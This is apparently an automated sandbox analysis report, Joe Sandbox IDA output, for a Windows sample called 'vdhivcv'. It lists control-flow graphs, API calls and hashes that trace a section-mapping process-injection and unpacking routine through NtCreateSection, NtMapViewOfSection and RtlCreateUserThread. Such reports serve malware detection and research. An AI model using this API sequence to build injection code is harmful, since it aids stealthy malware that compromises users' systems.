                                                                                                                          execution_graph 5542 401545 5543 401556 5542->5543 5544 4016ff NtDuplicateObject 5543->5544 5553 4015f5 5543->5553 5545 40171c NtCreateSection 5544->5545 5544->5553 5546 401742 NtMapViewOfSection 5545->5546 5547 40179c NtCreateSection 5545->5547 5546->5547 5548 401765 NtMapViewOfSection 5546->5548 5549 4017c8 5547->5549 5547->5553 5548->5547 5550 401783 5548->5550 5551 4017d2 NtMapViewOfSection 5549->5551 5549->5553 5550->5547 5552 4017f9 NtMapViewOfSection 5551->5552 5551->5553 5552->5553 5554 40181b 5552->5554 5554->5553 5555 401820 HeapCreate 5554->5555 5555->5553 5639 40165e 5640 401667 5639->5640 5641 4016ff NtDuplicateObject 5640->5641 5650 4019cd 5640->5650 5642 40171c NtCreateSection 5641->5642 5641->5650 5643 401742 NtMapViewOfSection 5642->5643 5644 40179c NtCreateSection 5642->5644 5643->5644 5645 401765 NtMapViewOfSection 5643->5645 5646 4017c8 5644->5646 5644->5650 5645->5644 5647 401783 5645->5647 5648 4017d2 NtMapViewOfSection 5646->5648 5646->5650 5647->5644 5649 4017f9 NtMapViewOfSection 5648->5649 5648->5650 5649->5650 5651 40181b 5649->5651 5651->5650 5652 401820 HeapCreate 5651->5652 5652->5650 5511 a7ee78 5512 a7ee83 5511->5512 5514 a7ee88 5511->5514 5515 a7ee89 5512->5515 5516 a7ee98 5515->5516 5519 a7f629 5516->5519 5521 a7f644 5519->5521 5520 a7f64d CreateToolhelp32Snapshot 5520->5521 5522 a7f669 Module32First 5520->5522 5521->5520 5521->5522 5523 a7eea1 5522->5523 5524 a7f678 5522->5524 5523->5514 5526 a7f2e8 5524->5526 5527 a7f313 5526->5527 5528 a7f324 VirtualAlloc 5527->5528 5529 a7f35c 5527->5529 5528->5529 5487 9a003c 5488 9a0049 5487->5488 5500 9a0e0f SetErrorMode SetErrorMode 5488->5500 5493 9a0265 5494 9a02ce VirtualProtect 5493->5494 5496 9a030b 5494->5496 5495 9a0439 VirtualFree 5499 9a04be LoadLibraryA 5495->5499 5496->5495 5498 9a08c7 5499->5498 5501 9a0223 5500->5501 5502 9a0d90 5501->5502 5503 9a0dad 5502->5503 5504 9a0dbb GetPEB 5503->5504 5505 9a0238 VirtualAlloc 5503->5505 5504->5505 5505->5493 5700 401a2f 5701 401a49 5700->5701 5702 401a6e Sleep 5701->5702 5703 401546 8 API calls 5702->5703 5704 401a89 5703->5704 5705 401652 8 API calls 5704->5705 5706 401a9a 5704->5706 5705->5706 5397 41c4f0 5400 41c110 5397->5400 5399 41c4f5 5401 41c120 5400->5401 5402 41c291 5401->5402 5403 41c1e1 9 API calls 5401->5403 5404 41c29a 6 API calls 5402->5404 5405 41c38d GlobalAlloc 5402->5405 5415 41c275 5403->5415 5406 41c2f0 6 API calls 5404->5406 5412 41c3a9 5405->5412 5409 41c376 OpenFileMappingA 5406->5409 5410 41c37f 5406->5410 5408 41c3e3 5420 41bd30 GetModuleHandleW GetProcAddress VirtualProtect 5408->5420 5409->5410 5410->5405 5419 41be70 LoadLibraryW 5412->5419 5413 41c3e8 5421 41c080 5413->5421 5415->5402 5416 41c3ed 5417 41c42e InterlockedDecrement GetSystemTime 5416->5417 5418 41c44a 5416->5418 5417->5416 5418->5399 5419->5408 5420->5413 5430 41bf60 5421->5430 5424 41c0b9 GetEnvironmentStringsW 5425 41c0bf 5424->5425 5433 41bfd0 5425->5433 5428 41c0f7 5428->5416 5429 41c0d6 GetConsoleAliasesA GetVolumePathNameW 5429->5428 5431 41bfa1 5430->5431 5432 41bf8c GetCommandLineA GetModuleFileNameW 5430->5432 5431->5424 5431->5425 5432->5431 5435 41c04e 5433->5435 5436 41bff3 5433->5436 5435->5428 5435->5429 5436->5435 5437 41c03a GetShortPathNameW 5436->5437 5438 41bfc0 5436->5438 5437->5436 5441 41bf10 5438->5441 5442 41bf40 5441->5442 5443 41bf2d GetAce 5441->5443 5442->5436 5443->5442 5588 9a092b GetPEB 5589 9a0972 5588->5589 5444 402ff5 5445 402fed 5444->5445 5447 403086 5445->5447 5448 401a23 5445->5448 5449 401a31 5448->5449 5450 401a6e Sleep 5449->5450 5455 401546 5450->5455 5452 401a89 5454 401a9a 5452->5454 5469 401652 5452->5469 5454->5447 5456 401556 5455->5456 5457 4016ff NtDuplicateObject 5456->5457 5466 4015f5 5456->5466 5458 40171c NtCreateSection 5457->5458 5457->5466 5459 401742 NtMapViewOfSection 5458->5459 5460 40179c NtCreateSection 5458->5460 5459->5460 5461 401765 NtMapViewOfSection 5459->5461 5462 4017c8 5460->5462 5460->5466 5461->5460 5463 401783 5461->5463 5464 4017d2 NtMapViewOfSection 5462->5464 5462->5466 5463->5460 5465 4017f9 NtMapViewOfSection 5464->5465 5464->5466 5465->5466 5467 40181b 5465->5467 5466->5452 5467->5466 5483 401820 5467->5483 5470 40165b 5469->5470 5471 4016ff NtDuplicateObject 5470->5471 5480 4019cd 5470->5480 5472 40171c NtCreateSection 5471->5472 5471->5480 5473 401742 NtMapViewOfSection 5472->5473 5474 40179c NtCreateSection 5472->5474 5473->5474 5475 401765 NtMapViewOfSection 5473->5475 5476 4017c8 5474->5476 5474->5480 5475->5474 5477 401783 5475->5477 5478 4017d2 NtMapViewOfSection 5476->5478 5476->5480 5477->5474 5479 4017f9 NtMapViewOfSection 5478->5479 5478->5480 5479->5480 5481 40181b 5479->5481 5480->5454 5481->5480 5482 401820 HeapCreate 5481->5482 5482->5480 5484 401822 HeapCreate 5483->5484 5486 40186e 5484->5486 5486->5466 5584 403135 5585 403278 5584->5585 5586 40315f 5584->5586 5586->5585 5587 40323b RtlCreateUserThread NtTerminateProcess 5586->5587 5587->5585 5726 401ab7 5727 401a73 5726->5727 5731 401a9a 5726->5731 5728 401a89 5727->5728 5729 401546 8 API calls 5727->5729 5730 401652 8 API calls 5728->5730 5728->5731 5729->5728 5730->5731 5736 41c3b6 5737 41c3c0 5736->5737 5746 41be70 LoadLibraryW 5737->5746 5739 41c3e3 5747 41bd30 GetModuleHandleW GetProcAddress VirtualProtect 5739->5747 5741 41c3e8 5742 41c080 7 API calls 5741->5742 5743 41c3ed 5742->5743 5744 41c42e InterlockedDecrement GetSystemTime 5743->5744 5745 41c44a 5743->5745 5744->5743 5746->5739 5747->5741 5506 4032f8 5508 40329b 5506->5508 5507 40323b RtlCreateUserThread NtTerminateProcess 5510 403278 5507->5510 5508->5507 5509 403301 5508->5509 5748 402fb8 5750 402fc0 5748->5750 5749 401a23 16 API calls 5751 403086 5749->5751 5750->5749 5750->5751 5538 40183b 5539 401842 HeapCreate 5538->5539 5541 40186e 5539->5541 5667 40327e 5671 403291 5667->5671 5668 40323b RtlCreateUserThread NtTerminateProcess 5670 403278 5668->5670 5669 403301 5671->5668 5671->5669

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 85 401546-40154f 86 401565 85->86 87 401556-4015ab call 4012cb 85->87 86->87 98 4015ad-4015c9 87->98 99 40161f-401624 87->99 103 401640 98->103 104 4015cb 98->104 101 401646-40164c 99->101 102 401626 99->102 105 40164d-40164f 101->105 106 40161b-40161d 104->106 107 4015cd-4015cf 104->107 106->99 108 4015d1-4015ea 107->108 109 401629-40163a 107->109 108->105 110 4015ec-4015f1 108->110 118 40165c 109->118 119 40163c 109->119 111 4015f3 110->111 112 40166e 110->112 116 4015f5-4015fe 111->116 117 401667-401668 111->117 114 40165b-40166c 112->114 115 40166f-4016a9 call 4012cb 112->115 120 401662 114->120 130 4016ab 115->130 131 4016ae-4016b3 115->131 117->115 118->120 120->117 130->131 133 4016b9-4016ca 131->133 134 4019cf-4019d7 131->134 137 4016d0-4016f9 133->137 138 4019cd 133->138 134->131 139 4019dc-401a20 call 4012cb 134->139 137->138 147 4016ff-401716 NtDuplicateObject 137->147 138->139 147->138 149 40171c-401740 NtCreateSection 147->149 151 401742-401763 NtMapViewOfSection 149->151 152 40179c-4017c2 NtCreateSection 149->152 151->152 153 401765-401781 NtMapViewOfSection 151->153 152->138 155 4017c8-4017cc 152->155 153->152 156 401783-401799 153->156 155->138 158 4017d2-4017f3 NtMapViewOfSection 155->158 156->152 158->138 160 4017f9-401815 NtMapViewOfSection 158->160 160->138 163 40181b 160->163 163->138 164 40181b call 401820 163->164 164->138
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6cd5c1709ac7b711dbdb46d56fa3852b59184e0f4001c1450d715fc554d72dd0
                                                                                                                          • Instruction ID: 8966994f51f5220269a050c3a05b0be66836dc0e2615c8264cabc048db8ca459
                                                                                                                          • Opcode Fuzzy Hash: 6cd5c1709ac7b711dbdb46d56fa3852b59184e0f4001c1450d715fc554d72dd0
                                                                                                                          • Instruction Fuzzy Hash: 13A126B1A04204FBDB219F91CC45FAF7BB8EF81750F24446BF542BA1E1D2799901CB5A

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 165 401652-4016a9 call 4012cb 179 4016ab 165->179 180 4016ae-4016b3 165->180 179->180 182 4016b9-4016ca 180->182 183 4019cf-4019d7 180->183 186 4016d0-4016f9 182->186 187 4019cd 182->187 183->180 188 4019dc-401a20 call 4012cb 183->188 186->187 196 4016ff-401716 NtDuplicateObject 186->196 187->188 196->187 198 40171c-401740 NtCreateSection 196->198 200 401742-401763 NtMapViewOfSection 198->200 201 40179c-4017c2 NtCreateSection 198->201 200->201 202 401765-401781 NtMapViewOfSection 200->202 201->187 204 4017c8-4017cc 201->204 202->201 205 401783-401799 202->205 204->187 207 4017d2-4017f3 NtMapViewOfSection 204->207 205->201 207->187 209 4017f9-401815 NtMapViewOfSection 207->209 209->187 212 40181b 209->212 212->187 213 40181b call 401820 212->213 213->187
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 769cff3db2a16ff9947aca2e1bc7df02427bdea62afa969ed6e84abdacd5d8fb
                                                                                                                          • Instruction ID: 08707dfce16203c79c186cea6ac9f890c639e5fa9aae9c39073b6eac8e5c48a5
                                                                                                                          • Opcode Fuzzy Hash: 769cff3db2a16ff9947aca2e1bc7df02427bdea62afa969ed6e84abdacd5d8fb
                                                                                                                          • Instruction Fuzzy Hash: B0514DB4900244BFEB209F91CC49FEFBBB8EF85B00F14012AF951BA1E5D6759945CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 214 40165e-4016a9 call 4012cb 225 4016ab 214->225 226 4016ae-4016b3 214->226 225->226 228 4016b9-4016ca 226->228 229 4019cf-4019d7 226->229 232 4016d0-4016f9 228->232 233 4019cd 228->233 229->226 234 4019dc-401a20 call 4012cb 229->234 232->233 242 4016ff-401716 NtDuplicateObject 232->242 233->234 242->233 244 40171c-401740 NtCreateSection 242->244 246 401742-401763 NtMapViewOfSection 244->246 247 40179c-4017c2 NtCreateSection 244->247 246->247 248 401765-401781 NtMapViewOfSection 246->248 247->233 250 4017c8-4017cc 247->250 248->247 251 401783-401799 248->251 250->233 253 4017d2-4017f3 NtMapViewOfSection 250->253 251->247 253->233 255 4017f9-401815 NtMapViewOfSection 253->255 255->233 258 40181b 255->258 258->233 259 40181b call 401820 258->259 259->233
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 8d2ab844faf546b4f5f52a9945f897ad4b2d557e0515ebb43b3a700dc4ab6994
                                                                                                                          • Instruction ID: d82c1138886ff24aec3403b45069446d704daea90aca27dc33efe5e37eb28e93
                                                                                                                          • Opcode Fuzzy Hash: 8d2ab844faf546b4f5f52a9945f897ad4b2d557e0515ebb43b3a700dc4ab6994
                                                                                                                          • Instruction Fuzzy Hash: B8514BB1900244BFEB208F91CC48FAFBBB8EF85B00F14016AF951BA2E5D6759905CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 260 40166a-4016a9 call 4012cb 273 4016ab 260->273 274 4016ae-4016b3 260->274 273->274 276 4016b9-4016ca 274->276 277 4019cf-4019d7 274->277 280 4016d0-4016f9 276->280 281 4019cd 276->281 277->274 282 4019dc-401a20 call 4012cb 277->282 280->281 290 4016ff-401716 NtDuplicateObject 280->290 281->282 290->281 292 40171c-401740 NtCreateSection 290->292 294 401742-401763 NtMapViewOfSection 292->294 295 40179c-4017c2 NtCreateSection 292->295 294->295 296 401765-401781 NtMapViewOfSection 294->296 295->281 298 4017c8-4017cc 295->298 296->295 299 401783-401799 296->299 298->281 301 4017d2-4017f3 NtMapViewOfSection 298->301 299->295 301->281 303 4017f9-401815 NtMapViewOfSection 301->303 303->281 306 40181b 303->306 306->281 307 40181b call 401820 306->307 307->281
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 1ea370aaa42164f932e49b278ceee8f942154ee2d8d32f83138b8784e9761f6c
                                                                                                                          • Instruction ID: 6d453cfa5274170bfbdae373e5c1c9b429e4ee8d346c6281ffbd38a208f90e25
                                                                                                                          • Opcode Fuzzy Hash: 1ea370aaa42164f932e49b278ceee8f942154ee2d8d32f83138b8784e9761f6c
                                                                                                                          • Instruction Fuzzy Hash: FF513AB4900245BBEB208F91CC48FAFBBB8EF85B00F14016AF951BA2E4D6759945CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 308 401691-4016a9 call 4012cb 312 4016ab 308->312 313 4016ae-4016b3 308->313 312->313 315 4016b9-4016ca 313->315 316 4019cf-4019d7 313->316 319 4016d0-4016f9 315->319 320 4019cd 315->320 316->313 321 4019dc-401a20 call 4012cb 316->321 319->320 329 4016ff-401716 NtDuplicateObject 319->329 320->321 329->320 331 40171c-401740 NtCreateSection 329->331 333 401742-401763 NtMapViewOfSection 331->333 334 40179c-4017c2 NtCreateSection 331->334 333->334 335 401765-401781 NtMapViewOfSection 333->335 334->320 337 4017c8-4017cc 334->337 335->334 338 401783-401799 335->338 337->320 340 4017d2-4017f3 NtMapViewOfSection 337->340 338->334 340->320 342 4017f9-401815 NtMapViewOfSection 340->342 342->320 345 40181b 342->345 345->320 346 40181b call 401820 345->346 346->320
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 95d62bb5d2fb3017c69896b09fd0c8dd1b8bc5303f582cbfad1cf34534ba11e6
                                                                                                                          • Instruction ID: a4aae6b86718a9dceeda142fe4c9f3d337048079e59506af87c2624b4c8528a1
                                                                                                                          • Opcode Fuzzy Hash: 95d62bb5d2fb3017c69896b09fd0c8dd1b8bc5303f582cbfad1cf34534ba11e6
                                                                                                                          • Instruction Fuzzy Hash: 535108B5900249BBEF209F91CC48FEFBBB8EF85B10F104169F951AA2A5D7709944CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 348 403135-403159 349 403278-40327d 348->349 350 40315f-403177 348->350 350->349 351 40317d-40318e 350->351 352 403190-403199 351->352 353 40319e-4031ac 352->353 353->353 354 4031ae-4031b5 353->354 355 4031d7-4031de 354->355 356 4031b7-4031d6 354->356 357 403200-403203 355->357 358 4031e0-4031ff 355->358 356->355 359 403205-403208 357->359 360 40320c 357->360 358->357 359->360 361 40320a 359->361 360->352 362 40320e-403213 360->362 361->362 362->349 363 403215-403218 362->363 363->349 364 40321a-403275 RtlCreateUserThread NtTerminateProcess 363->364 364->349
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcessTerminateThreadUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1921587553-0
                                                                                                                          • Opcode ID: 88e323ebcc8cfc6628e15868eb3694d16e1535974f295d677a4f92b6fbc021e4
                                                                                                                          • Instruction ID: ea6061ee1c3098f13e0f7a0edf0e04afb299d666a4a386905c82e4678c4decca
                                                                                                                          • Opcode Fuzzy Hash: 88e323ebcc8cfc6628e15868eb3694d16e1535974f295d677a4f92b6fbc021e4
                                                                                                                          • Instruction Fuzzy Hash: 5B412632618E084FD768EF6CA84966277D6E798311B2643AED808D7385EE30D85183C5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 366 40327e-40328f 367 403291-403293 366->367 368 4032fd-4032ff 366->368 370 40329b-4032b4 367->370 369 403301-403321 368->369 368->370 371 403323 369->371 372 40332a-403335 369->372 373 4032b6 370->373 374 4032bb-4032c5 370->374 371->372 375 403325-403326 371->375 377 403337 372->377 378 40333c-403351 372->378 373->374 376 4032b8 373->376 379 4032c7 374->379 380 4032ce-4032f4 call 401349 374->380 375->372 381 4032ba 376->381 382 40323b-40327d RtlCreateUserThread NtTerminateProcess 376->382 377->378 383 403339-40333a 377->383 390 403354 378->390 379->380 385 4032c8-4032cd 379->385 380->368 381->374 383->378 385->380 390->390
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e6b5d4aa042eeb9fc5c67cc315633b6bcdb668e3db296512d28d2684d4bbfc7d
                                                                                                                          • Instruction ID: f85e0e2fc3bef3d1689db4ef00eb6110e2ec86435fc76eaec67dd06365047321
                                                                                                                          • Opcode Fuzzy Hash: e6b5d4aa042eeb9fc5c67cc315633b6bcdb668e3db296512d28d2684d4bbfc7d
                                                                                                                          • Instruction Fuzzy Hash: 4C315D7180C2848FD714DFA898C63677FA4EF15316F2804FFD88567392D6399605978B

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 9a003c-9a0047 1 9a0049 0->1 2 9a004c-9a0263 call 9a0a3f call 9a0e0f call 9a0d90 VirtualAlloc 0->2 1->2 17 9a028b-9a0292 2->17 18 9a0265-9a0289 call 9a0a69 2->18 20 9a02a1-9a02b0 17->20 22 9a02ce-9a03c2 VirtualProtect call 9a0cce call 9a0ce7 18->22 20->22 23 9a02b2-9a02cc 20->23 29 9a03d1-9a03e0 22->29 23->20 30 9a0439-9a04b8 VirtualFree 29->30 31 9a03e2-9a0437 call 9a0ce7 29->31 33 9a04be-9a04cd 30->33 34 9a05f4-9a05fe 30->34 31->29 36 9a04d3-9a04dd 33->36 37 9a077f-9a0789 34->37 38 9a0604-9a060d 34->38 36->34 40 9a04e3-9a0505 36->40 41 9a078b-9a07a3 37->41 42 9a07a6-9a07b0 37->42 38->37 43 9a0613-9a0637 38->43 51 9a0517-9a0520 40->51 52 9a0507-9a0515 40->52 41->42 44 9a086e-9a08be LoadLibraryA 42->44 45 9a07b6-9a07cb 42->45 46 9a063e-9a0648 43->46 50 9a08c7-9a08f9 44->50 48 9a07d2-9a07d5 45->48 46->37 49 9a064e-9a065a 46->49 53 9a07d7-9a07e0 48->53 54 9a0824-9a0833 48->54 49->37 55 9a0660-9a066a 49->55 58 9a08fb-9a0901 50->58 59 9a0902-9a091d 50->59 60 9a0526-9a0547 51->60 52->60 61 9a07e2 53->61 62 9a07e4-9a0822 53->62 57 9a0839-9a083c 54->57 56 9a067a-9a0689 55->56 63 9a068f-9a06b2 56->63 64 9a0750-9a077a 56->64 57->44 65 9a083e-9a0847 57->65 58->59 66 9a054d-9a0550 60->66 61->54 62->48 67 9a06ef-9a06fc 63->67 68 9a06b4-9a06ed 63->68 64->46 69 9a084b-9a086c 65->69 70 9a0849 65->70 72 9a05e0-9a05ef 66->72 73 9a0556-9a056b 66->73 76 9a074b 67->76 77 9a06fe-9a0748 67->77 68->67 69->57 70->44 72->36 74 9a056f-9a057a 73->74 75 9a056d 73->75 78 9a059b-9a05bb 74->78 79 9a057c-9a0599 74->79 75->72 76->56 77->76 84 9a05bd-9a05db 78->84 79->84 84->66
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 009A024D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983346956.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_9a0000_vdhivcv.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                          • Instruction ID: 1a343bfe23284ccad9c55bbd4bc15e529e1d6f2517d0bc10554711d8a12dd09a
                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                          • Instruction Fuzzy Hash: 8D527874A00229DFDB64CF68C984BACBBB1BF49304F1480D9E94DAB251DB34AE94DF54

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 347 41bd30-41be6e GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00806520), ref: 0041BE0C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00420B08), ref: 0041BE49
                                                                                                                          • VirtualProtect.KERNELBASE(00806364,0080651C,00000040,?), ref: 0041BE69
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983099018.000000000040F000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_40f000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2099061454-0
                                                                                                                          • Opcode ID: b73ac9cb225b51c4fd3d0c368e28526717c9643879deb31053f81edd332f6925
                                                                                                                          • Instruction ID: c95171ec45ed043d524413fa4937ecd1da42087480964d5970ea1364d67dfc6c
                                                                                                                          • Opcode Fuzzy Hash: b73ac9cb225b51c4fd3d0c368e28526717c9643879deb31053f81edd332f6925
                                                                                                                          • Instruction Fuzzy Hash: AB31C024718781CAE361DBA4FC457113EE2BB6A708F44506C9184873FAF3BA5535C76E

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 394 a7f629-a7f642 395 a7f644-a7f646 394->395 396 a7f64d-a7f659 CreateToolhelp32Snapshot 395->396 397 a7f648 395->397 398 a7f65b-a7f661 396->398 399 a7f669-a7f676 Module32First 396->399 397->396 398->399 404 a7f663-a7f667 398->404 400 a7f67f-a7f687 399->400 401 a7f678-a7f679 call a7f2e8 399->401 405 a7f67e 401->405 404->395 404->399 405->400
                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A7F651
                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 00A7F671
                                                                                                                          Memory Dump Source
